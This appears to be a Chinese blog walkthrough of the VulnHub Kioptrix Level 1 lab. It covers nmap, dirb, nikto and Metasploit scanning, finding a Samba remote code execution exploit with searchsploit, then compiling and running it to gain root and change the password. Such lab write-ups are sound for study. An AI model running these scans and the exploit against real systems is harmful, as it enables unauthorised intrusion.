标签:uid bin 扫描 地址 open 改密码 服务 lin bash
猫宁~~~
地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
重点关注工具使用和测试思路。
kali linux攻击机 192.168.100.4
nmap 192.168.100.0/24
确认靶机的IP
Kioptrix-1.0靶机 192.168.100.5
nmap -sV -p1-65535 192.168.100.5
全端口扫描
结果如下,开放22,80,139,443,系统是centos
22 ssh
OpenSSH 2.9p2 (protocol 1.99)
80 http
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind
2 (RPC #100000)
139/tcp open netbios-ssn
Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status
1 (RPC #100024)
dirb 192.168.100.5
扫描目录
nikto -h 192.168.100.5
扫描linux相关指纹与漏洞
重点关注一下开放139端口的Samba smbd服务。
msfconsole
search smb
use auxiliary/scanner/smb/smb_version
show options
set rhost 192.168.100.5
run
Host could not be identified: Unix (Samba 2.2.1a)
searchsploit samba
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
/usr/share/exploitdb/exploits/multiple/remote/10.c
cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/10.c
尝试一下。
payload地址:https://www.exploit-db.com/exploits/10
gcc 10.c -o muma
./muma -d 0 -C 60 -S 192.168.100
扫描1个C段。
./muma -b 0 -v 192.168.100.5
直接获取root权限。
uid=0(root) gid=0(root) groups=99(nobody)
python -v
显示python版本是1.5的
python -c ‘import pty; pty.spawn("/bin/bash")‘
无法运行
passwd命令修改密码为123456
经虚拟机登录上去。
PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1
标签:uid bin 扫描 地址 open 改密码 服务 lin bash
原文地址:https://www.cnblogs.com/landesk/p/13630046.html